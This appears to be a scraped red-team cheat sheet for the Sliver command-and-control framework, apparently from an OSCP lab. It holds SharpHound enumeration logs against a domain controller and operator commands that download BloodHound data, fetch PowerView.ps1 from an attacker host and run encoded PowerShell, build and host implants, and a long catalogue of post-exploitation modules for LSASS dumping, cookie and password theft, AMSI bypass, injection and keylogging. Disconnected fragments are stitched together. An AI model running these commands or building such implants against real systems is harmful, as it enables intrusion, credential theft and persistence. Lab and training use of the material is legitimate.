2025-07-06T06:02:28.6250783-07:00|ERROR|[CommonLib DCRegProc]Error getting data from registry for DC01.OSCP.EXAM: SYSTEM\CurrentControlSet\Services\Kdc:StrongCertificateBindingEnforcement
System.Security.SecurityException: Requested registry access is not allowed.
at System.ThrowHelper.ThrowSecurityException(ExceptionResource resource)
at Microsoft.Win32.RegistryKey.OpenSubKey(String name, Boolean writable)
at SharpHoundCommonLib.SHRegistryKey.GetValue(String subkey, String name)
at SharpHoundCommonLib.Helpers.GetRegistryKeyData(String target, String subkey, String subvalue, ILogger log)
The Zone of the assembly that failed was:
MyComputer
2025-07-06T06:02:28.6623263-07:00|INFORMATION|Consumers finished, closing output channel
2025-07-06T06:02:28.6734273-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2025-07-06T06:02:28.8036967-07:00|INFORMATION|Status: 332 objects finished (+332 7.904762)/s -- Using 51 MB RAM
2025-07-06T06:02:28.8123637-07:00|INFORMATION|Enumeration finished in 00:00:42.5540337
2025-07-06T06:02:28.8550561-07:00|INFORMATION|Saving cache with stats: 273 ID to type mappings.
274 name to SID mappings.
3 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2025-07-06T06:02:28.8844479-07:00|INFORMATION|SharpHound Enumeration Completed at 6:02 AM on 7/6/2025! Happy Graphing!
[server] sliver (agent1) > download 20250706060228_BloodHound.zip
[*] Wrote 25188 bytes (1 file successfully, 0 files unsuccessfully) to /home/chel/offsec/Challenge 4 - OSCP A/20250706060228_BloodHound.zip
[server] sliver (agent1) >
sliver (AMUSED_GEMSBOK) > sharpsh – ‘-u http://192.168.56.1:9090/PowerView.ps1 -e -c RwBlAHQALQBEAG8AbQBhAGkAbgBHAHIAbwB1AHAAIAAiAEQAbwBtAGEAaQBuACAAQQBkAG0AaQBuAHMAIgA=’
[server] sliver (agent) > download -r MicrosoftEdgeBackups
[server] sliver > http
[server] sliver > websites add-content --website tool --content agent.exe
See https://github.com/skahwah/SQLRecon/wiki
if this error occures, just delete the old
[server] sliver > implants
[server] sliver > implants rm agent-name
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[!] rpc error: code = Unknown desc = UNIQUE constraint failed: implant_builds.name
Commands:
=========
clear clear the screen
exit exit the shell
help use 'help [command]' for command help
monitor Monitor threat intel platforms for Sliver implants
wg-config Generate a new WireGuard client config
wg-portfwd List ports forwarded by the WireGuard tun interface
wg-socks List socks servers listening on the WireGuard tun interface
Generic:
========
aliases List current aliases
armory Automatically download and install extensions/aliases
background Background an active session
beacons Manage beacons
builders List external builders
canaries List previously generated canaries
cursed Chrome/electron post-exploitation tool kit (∩`-´)⊃━☆゚.*・。゚
dns Start a DNS listener
env List environment variables
generate Generate an implant binary
hosts Manage the database of hosts
http Start an HTTP listener
https Start an HTTPS listener
implants List implant builds
jobs Job control
licenses Open source licenses
loot Manage the server's loot store
mtls Start an mTLS listener
prelude-operator Manage connection to Prelude's Operator
profiles List existing profiles
reaction Manage automatic reactions to events
regenerate Regenerate an implant
sessions Session management
settings Manage client settings
stage-listener Start a stager listener
tasks Beacon task management
update Check for updates
use Switch the active session or beacon
version Display version information
websites Host static content (used with HTTP C2)
wg Start a WireGuard listener
Multiplayer:
============
kick-operator Kick an operator from the server
multiplayer Enable multiplayer mode
new-operator Create a new operator config file
operators Manage operators
Sliver - 3rd Party extensions:
==============================
bof-roast Beacon Object File repo for roasting Active Directory
bof-servicemove Lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking
c2tc-addmachineaccount AddMachineAccount [Computername] [Password <Optional>]
c2tc-askcreds Collect passwords using CredUIPromptForWindowsCredentialsName
c2tc-domaininfo enumerate domain information using Active Directory Domain Services
c2tc-kerberoast A BOF tool to list all SPN enabled user/service accounts or request service tickets (TGS-REP)
c2tc-kerbhash port of the Mimikatz/Rubeus hash command
c2tc-klist Displays a list of currently cached Kerberos tickets.
c2tc-lapsdump Dump LAPS passwords from specified computers within Active Directory
c2tc-petitpotam PetitPotam <capture server ip or hostname> <target server ip or hostname>
c2tc-psc show detailed information from processes with established TCP and RDP connections
c2tc-psk show detailed information from the windows kernel and loaded driver modules
c2tc-psm show detailed information from a specific process id
c2tc-psw Show Window titles from processes with active Windows
c2tc-psx show (detailed) information from all processes running on the system
c2tc-smbinfo Gather remote system version info using the NetWkstaGetInfo API
c2tc-spray-ad Perform a Kerberos or ldap password spraying attack against Active Directory
c2tc-startwebclient Starting WebClient Service Programmatically
c2tc-wdtoggle Patch lsass to enable WDigest credential caching
c2tc-winver Display the version of Windows that is running, the build number and patch release (Update Build Revision)
chisel Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH
chromiumkeydump Dump Chrome/Edge Masterkey
coff-loader Load and execute Beacon Object Files (BOFs) in memory.
credman Dump credentials using the CredsBackupCredentials API
delegationbof LDAP checks for RBCD, Constrained, Constrained w/Protocol Transition, Unconstrained Delegation, ASREP, and Kerberoastable SPNs
find-module Uses direct system calls to enumerate processes for specific modules
find-proc-handle Uses direct system calls to enumerate processes for specific process handles
go-cookie-monster Chrome cookie stealer with AppBound key support
handlekatz Implementation of handlekatz as a BOF (x64 only)
hashdump Dump local SAM password hashes
hollow EarlyBird process hollowing technique
inject-amsi-bypass Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection.
inject-clipboard inject into a process
inject-conhost inject into a process
inject-createremotethread inject into a process
inject-ctray inject into a process
inject-dde inject into a process
inject-etw-bypass Inject ETW Bypass into Remote Process via Syscalls (HellsGate HalosGate)
inject-kernelcallbacktable inject into a process
inject-ntcreatethread inject into a process
inject-ntqueueapcthread inject into a process
inject-setthreadcontext inject into a process
inject-svcctrl inject into a process
inject-tooltip inject into a process
inject-uxsubclassinfo inject into a process
inline-execute-assembly in process .NET assembly execution
jump-psexec psexec lateral movement module
jump-wmiexec wmiexec lateral movement module
kerbrute A tool to perform Kerberos pre-auth bruteforcing
ldapsigncheck check LDAP signing
mimikatz A little tool to play with Windows security
nanodump A Beacon Object File that creates a minidump of the LSASS process.
nanorobeus Beacon Object File for managing Kerberos tickets
patchit patch, check and revert AMSI and ETW for x64 process
portbender TCP Port Redirection Utility
raw-keylogger Logs keystrokes using the raw input interface
remote-adcs-request Request an certificate from an AD certificate server
remote-adcs_request_on_behalf Requests an enrollment certificate on behalf of another user
remote-adduser Add a new user to a machine
remote-addusertogroup Add the specified user to the domain group
remote-chrome-key Get Decryption key usable with Chlonium (https://github.com/rxwx/chlonium)
remote-enable-user Unlock and enable a local / remote user account
remote-get_priv Activate the specified token privledge, more for non-cobalt strike users
remote-ghost_task direct registry manipulation to create scheduled tasks without triggering the usual event logs
remote-global_unprotect Attempts to find, decrypt, and download Global Protect VPN profiles and HIP settings
remote-lastpass Searches memory for LastPass passwords and hashes
remote-make_token_cert Applies an impersonation token based on the Alt Name in a supplied .pfx file
remote-office-tokens Searches memory for Office JWT Access Tokens
remote-procdump Dumps the specified process to the specified output file
remote-process-destroy Attempt to crash a local process by cutting all handles in it.
remote-process-list-handles list the various handles a process has open
remote-reg-delete Delete a registry key or value
remote-reg-save backup a registry have to a file on disk (requires Enabled SEBackup Priv)
remote-reg-set Dumps the specified process to the specified output file
remote-sc-config configure an existing service
remote-sc-create Create a new service on a windows system
remote-sc-delete delete a service from a windows based computer
remote-sc-description change description of a server
remote-sc-start Start service on a windows based system
remote-sc-stop stop service on a windows based system
remote-sc_failure sc_failure
remote-schtasks-delete Delete a scheduled task
remote-schtasks-stop stop a running scheduled task
remote-schtaskscreate Unlock and enable a local / remote user account
remote-schtasksrun run a scheduled task
remote-setuserpass set the password for a given user account
remote-shspawnas spawn / inject as specified user
remote-slackKey Decrypts the provided base64 encoded Chrome key
remote-slack_cookie Collect the Slack authentication cookie from a Slack process
remote-suspendresume uspend a process by pid
remote-unexpireuser Enables and unlocks the specified user account
sa-adcs-enum Enumerates CAs and templates in the AD using Win32 functions
sa-adcs-enum-com Enumerates CAs and templates in the AD using ICertConfig COM object
sa-adcs-enum-com2 Enumerates CAs and templates in the AD using IX509PolicyServerListManager COM object
sa-adv-audit-policies Retrieves advanced security audit policies
sa-arp Lists ARP table
sa-cacls Lists user permissions for the specified file, wildcards supported
sa-dir Lists a target directory using BOF.
sa-driversigs Enumerate installed services Image paths
sa-enum-filter-driver Enumerates all the filter drivers
sa-enum-local-sessions Enumerate the currently attached user sessions both local and over rdp
sa-env List process environment variables
sa-find-loaded-module Finds what processes *modulepart* is loaded into, optionally searching just *procnamepart*
sa-get-netsession Enumerates all sessions on the specified computer or the local one
sa-get-netsession2 Modified version of netsession that supports BOFHound
sa-get-password-policy Gets target server or domain's configured password policy and lockouts
sa-ipconfig Simply gets ipv4 addresses, hostname and dns server
sa-ldapsearch Execute LDAP searches (non paged)
sa-list_firewall_rules List Windows firewall rules
sa-listdns Pulls dns cache entries, attempts to query and resolve each
sa-listmods List a process' modules (DLL)
sa-locale List system locale language, locale ID, date, time, and country
sa-netgroup Lists Groups from the default (or specified) domain
sa-netlocalgroup List local groups from the local (or specified) computer
sa-netlocalgroup2 List server group members
sa-netloggedon Return users logged on the local or remote computer
sa-netloggedon2 Modified version of netloggedon that supports BOFHound
sa-netshares List shares on local or remote computer
sa-netstat TCP / UDP IPv4 netstat listing
sa-nettime Display time on remote computer
sa-netuptime Return information about the boot time on the local or remote computer
sa-netuser Pulls info about specific user.
sa-netuserenum Net user enumeration
sa-netview Net view
sa-notepad Search for open notepad and notepad++ windows and grab text from the editor control object
sa-nslookup Makes a dns query. NOTE: Some situations are limited due to observed crashes
sa-probe Check if a specific port is open
sa-reg-query Query the Windows registry
sa-regsession Return logged on user SIDs by enumerating HKEY_USERS
sa-routeprint Prints IPv4 configured routes
sa-sc-enum Enumerate Windows services
sa-sc-qc Queries the configuration information for a specified service.
sa-sc-qdescription sc qdescription implementation in bof
sa-sc-qfailure sc qfailure implementation in bof
sa-sc-qtriggerinfo Queries a service for trigger conditions.
sa-sc-query sc query implementation in bof
sa-schtasksenum Enumerates all scheduled tasks on the local or if provided remote machine
sa-schtasksquery Queries the given task from the local or if provided remote machine
sa-tasklist Get a list of running processes including PID, PPID and CommandLine (uses wmi)
sa-uptime Prints system boot time and how long it's been since then
sa-vssenum Enumerates shadow copies on some server 2012+ machines
sa-whoami Simulates whoami /all
sa-windowlist Lists visible windows in the current users session
sa-wmi-query Run a wmi query and display results in CSV format
scshell Fileless lateral movement
secinject Section Mapping Process Injection
syscalls_shinject Inject shellcode (either custom or beacon) into remote process using Syscalls
tgtdelegation tgtdelegation: Obtain a usable Kerberos TGT
threadless-inject Execute shellcode within a remote process via hooking function calls.
unhook-bof Remove API hooks from a Beacon process.
winrm Execute commands remotely via WinRM
Sliver - 3rd Party macros:
==========================
certify [Certify] Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services
krbrelayup [KrbRelayUp] A universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).
mlokit [mlokit] MLOps Attack Toolkit
nps [NoPowerShell] PowerShell rebuilt in C# for Red Teaming purposes
rubeus [Rubeus] Rubeus is a C# tool set for raw Kerberos interaction and abuses.
seatbelt [Seatbelt] Seatbelt is a C# project that performs a number of security oriented host-survey 'safety checks'
sharp-hound-3 [Sharp Hound 3] C# based BloodHound Ingestor
sharp-hound-4 [SharpHound v4] C# based BloodHound Ingestor
sharp-smbexec [Sharp SMBExec] A native C# conversion of the Invoke-SMBExec powershell script
sharp-wmi [Sharp WMI] C# implementation of various WMI functionality
sharpchrome [SharpChrome] adaptation of work from @gentilkiwi and @djhohnstein, specifically his SharpChrome project
sharpdpapi [SharpDPAPI] # port of some DPAPI functionality from @gentilkiwi's Mimikatz project
sharpersist [SharPersist] Windows persistence toolkit
sharplaps [SharpLAPS] Retrieve LAPS password from LDAP
sharpmapexec [SharpMapExec] A sharpen version of CrackMapExec
sharprdp [SharpRDP] Remote Desktop Protocol .NET Console Application for Authenticated Command Execution
sharpsccm [SharpSCCM] A C# utility for interacting with SCCM
sharpsecdump [SharpSecDump] C# port of impacket's secretsdump.py functionality
sharpsh [sharpsh] C# .Net Framework program that uses RunspaceFactory for Powershell command execution.
sharpup [SharpUp] C# port of various PowerUp functionality
sharpview [SharpView] C# implementation of harmj0y's PowerView
sqlrecon [sqlrecon] MS SQL toolkit designed for offensive reconnaissance and post-exploitation
Sliver - Windows:
=================
backdoor Infect a remote file with a sliver shellcode
dllhijack Plant a DLL for a hijack scenario
execute-assembly Loads and executes a .NET assembly in a child process (Windows Only)
getprivs Get current privileges (Windows only)
getsystem Spawns a new sliver session as the NT AUTHORITY\SYSTEM user (Windows Only)
impersonate Impersonate a logged in user.
make-token Create a new Logon Session with the specified credentials
migrate Migrate into a remote process
psexec Start a sliver service on a remote target
registry Windows registry operations
rev2self Revert to self: lose stolen Windows token
runas Run a new process in the context of the designated user (Windows Only)
spawndll Load and execute a Reflective DLL in a remote process
Sliver:
=======
cat Dump file to stdout
cd Change directory
chmod Change permissions on a file or directory
chown Change owner on a file or directory
chtimes Change access and modification times on a file (timestomp)
close Close an interactive session without killing the remote process
download Download a file
execute Execute a program on the remote system
execute-shellcode Executes the given shellcode in the sliver process
extensions Manage extensions
getgid Get session process GID
getpid Get session pid
getuid Get session process UID
ifconfig View network interface configurations
info Get info about session
interactive Task a beacon to open an interactive session (Beacon only)
kill Kill a session
ls List current directory
memfiles List current memfiles
mkdir Make a directory
msf Execute an MSF payload in the current process
msf-inject Inject an MSF payload into a process
mv Move or rename a file
netstat Print network connection information
ping Send round trip message to implant (does not use ICMP)
pivots List pivots for active session
portfwd In-band TCP port forwarding
procdump Dump process memory
ps List remote processes
pwd Print working directory
reconfig Reconfigure the active beacon/session
rename Rename the active beacon/session
rm Remove a file or directory
rportfwd reverse port forwardings
screenshot Take a screenshot
shell Start an interactive shell
shikata-ga-nai Polymorphic binary shellcode encoder (ノ ゜Д゜)ノ ︵ 仕方がない
sideload Load and execute a shared object (shared library/DLL) in a remote process
socks5 In-band SOCKS5 Proxy
ssh Run a SSH command on a remote host
terminate Terminate a process on the remote system
upload Upload a file
whoami Get session user execution context
Contact us for a no-obligation conversation about your security needs.
Contact us